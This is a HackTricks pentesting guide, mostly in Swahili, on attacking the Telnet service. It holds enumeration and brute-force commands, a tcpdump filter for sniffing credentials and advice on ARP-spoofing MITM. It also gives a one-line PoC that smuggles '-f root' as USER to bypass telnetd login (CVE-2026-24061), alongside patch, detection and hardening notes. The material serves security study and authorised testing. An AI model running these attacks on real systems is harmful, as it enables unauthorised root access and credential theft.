23 - Pentesting Telnet

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Telnet ni itifaki ya mtandao inayowapa watumiaji njia isiyo salama ya kufikia kompyuta kupitia mtandao.

Default port: 23

23/tcp open  telnet

Uorodheshaji

Banner Grabbing

nc -vn <IP> 23

Enumeration yote ya kuvutia inaweza kufanywa na nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

The script telnet-ntlm-info.nse itapata taarifa za NTLM (matoleo ya Windows).

From the telnet RFC: Katika TELNET Protocol kuna mbalimbali “chaguzi” ambazo zitaruhusiwa na zinaweza kutumika pamoja na muundo wa “DO, DON’T, WILL, WON’T” ili kumruhusu mtumiaji na server kukubaliana kutumia seti ya kanuni zilizoelezwa zaidi (au labda tofauti) kwa muunganisho wao wa TELNET. Chaguzi hizi zinaweza kujumuisha kubadilisha character set (seti ya tabia za herufi), hali ya echo (echo mode), n.k.

Nafahamu inawezekana kuorodhesha chaguzi hizi lakini sijui jinsi, hivyo niambie ikiwa unajua jinsi.

Orodhesha Chaguzi / Vipengele za Telnet

Telnet inatumia IAC + DO/DONT/WILL/WONT mazungumzo ili kuwezesha chaguzi. Unaweza kuona chaguzi zinazotumiwa kwa kukamata mazungumzo ya awali na kwa kupima vipengele maalum.

Nmap option/feature probes

# Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

# Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

Skripti ya telnet-encryption inakagua kama chaguo la ENCRYPT linaungwa mkono; utekelezaji fulani kihistoria ulikuwa ukishughulikia chaguo hili kwa makosa na ulikuwa hatarini, lakini skripti hii inakagua tu uungaji mkono. telnet-ntlm-info huweka wazi NTLM metadata (NetBIOS/DNS/OS build) wakati Microsoft Telnet NTLM imewezeshwa. telnet-brute ni mkaguzi wa NSE wa brute-force kwa Telnet.

Brute force

Faili ya usanidi

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Amri za Kiotomatiki

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for t=Telnet
Note: |
wireshark to hear creds being passed
tcp.port == 23 and ip.addr != myip

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
Name: Banner Grab
Description: Grab Telnet Banner
Command: nc -vn {IP} 23

Entry_3:
Name: Nmap with scripts
Description: Run nmap scripts for telnet
Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
Name: consoleless mfs enumeration
Description: Telnet enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Udhaifu wa Hivi Karibuni (2022-2026)

• CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Ukaguzi usio sahihi wa input katika telnet service unawawezesha washambuliaji wa mbali kuingia watumiaji kwa kutumia hard-coded credentials na ku-inject OS commands; imerekebishwa na firmware 1.04B05 au baadaye.
• CVE-2023-40478 – NETGEAR RAX30: Stack-based buffer overflow katika Telnet CLI passwd command inawezesha network-adjacent code execution kama root; authentication inahitajika lakini inaweza kupitishwa.
• CVE-2022-39028 – GNU inetutils telnetd: Mfuatano wa byte mbili (0xff 0xf7 / 0xff 0xf8) unaweza kusababisha NULL-pointer dereference katika telnetd, na crashes zinazorudiwa zinaweza kusababisha inetd kuzima service (DoS).

Kumbuka CVE hizi wakati wa tathmini ya udhaifu — ikiwa lengo linaendesha firmware isiyosasishwa au legacy inetutils Telnet daemon unaweza kuwa na njia rahisi kuelekea code-execution au DoS inayovuruga.

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Primitive: Telnet NEW_ENVIRON inaruhusu wateja kusukuma environment variables wakati wa option negotiation; inetutils telnetd inabadilisha %U katika login template yake na getenv("USER") na kuipitisha moja kwa moja kwa /usr/bin/login, ikiruhusu argv-level option injection (no shell expansion). Root cause: versions 1.9.3–2.7 zinaexpand %U bila kuchuja, hivyo thamani ya USER inaanza kwa - inachambuliwa kama flag ya login. Kwa mfano, %U inakuwa -f root, ikitoa /usr/bin/login -h <hostname> "-f root" na kupitisha authentication kupitia login -f.

Exploit flow:

1. Unganisha kwenye Telnet service na negotiate NEW_ENVIRON ili kuweka USER=-f root.
2. telnetd inajenga login argv ikiwa na thamani ya %U inayodhibitiwa na mshambuliaji.
3. /usr/bin/login hufasiri -f root kama “pre-authenticated user root” na hutengeneza root shell.

PoC

# Inject USER via NEW_ENVIRON and obtain a root shell
USER='-f root' telnet -a <ip>

Patch note: inetutils 2.7-2 introduces a sanitize() helper that rejects values starting with - or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection. Detection/verification: tambua daemons zilizo wazi kwa kutumia telnetd --version, dpkg -l | grep inetutils, systemctl status inetutils-telnetd, au netstat -tlnp | grep :23.

Mitigations

• Sanidi/Sasisha vifurushi vilivyoathirika mara moja (mf., Debian fixes are in 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, and 2:2.7-2).
• Zima Telnet au punguza ufikiaji kwa mitandao ya usimamizi ya kuaminika wakati wa kusasisha.

Kunasa credentials & Man-in-the-Middle

Telnet hubeba kila kitu, ikijumuisha nywila na majina ya watumiaji, kwa clear-text. Njia mbili za haraka za kuzikamata:

# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)

Kwa MITM ya active, changanya ARP spoofing (mfano: arpspoof/ettercap) na vichujio vya sniffing sawa ili kuvuna passwords kwenye switched networks.

Automated Brute-force / Password Spraying

# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Wengi wa botnet za IoT (tofauti za Mirai) bado huvinjari port 23 kwa kamusi ndogo za default-credential—kuiga mantiki hiyo kunaweza haraka kutambua vifaa dhaifu.

Exploitation & Post-Exploitation

Metasploit ina moduli kadhaa muhimu:

• auxiliary/scanner/telnet/telnet_version – banner & option enumeration.
• auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
• auxiliary/scanner/telnet/telnet_encrypt_overflow – RCE dhidi ya Solaris 9/10 Telnet zilizo na dosari (ushughulikiaji wa chaguo ENCRYPT).
• exploit/linux/mips/netgear_telnetenable – inawezesha huduma ya telnet kwa packet iliyotengenezwa kwenye router nyingi za NETGEAR.

Baada ya kupata shell, kumbuka kwamba TTYs kwa kawaida ni ‘dumb’; boresha kwa python -c 'import pty;pty.spawn("/bin/bash")' au tumia HackTricks TTY tricks.

Kuimarisha & Ugunduzi (Blue team corner)

1. Tumia SSH na uzime huduma ya Telnet kabisa.
2. Ikiwa Telnet inahitajika, iweke kwenye management VLANs pekee, tekekeleza ACLs na ufunike daemon kwa TCP wrappers (/etc/hosts.allow).
3. Badilisha utekelezaji wa kale wa telnetd na ssl-telnet au telnetd-ssl kuongeza usimbaji wa usafirishaji, lakini hii inalinda tu data-in-transit—kubashiri nywila kunabaki rahisi.
4. Simamia trafiki za kutoka nje kuelekea port 23; uvunjaji mara nyingi huanzisha reverse shells kwa Telnet ili kupita vichujio vikali vya egress vya HTTP.

Marejeo

• OffSec – CVE-2026-24061 – GNU InetUtils telnetd Authentication Bypass Vulnerability
• Inetutils sanitize() fix (ccba9f748aa8d50a38d7748e2e60362edd6a32cc)
• NVD – CVE-2026-24061
• Debian Security Tracker – CVE-2026-24061
• Canadian Centre for Cyber Security Alert AL26-002 (CVE-2026-24061)
• NVD – CVE-2022-39028 inetutils telnetd DoS
• NVD – CVE-2024-45698 D-Link DIR-X4860 Telnet RCE

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.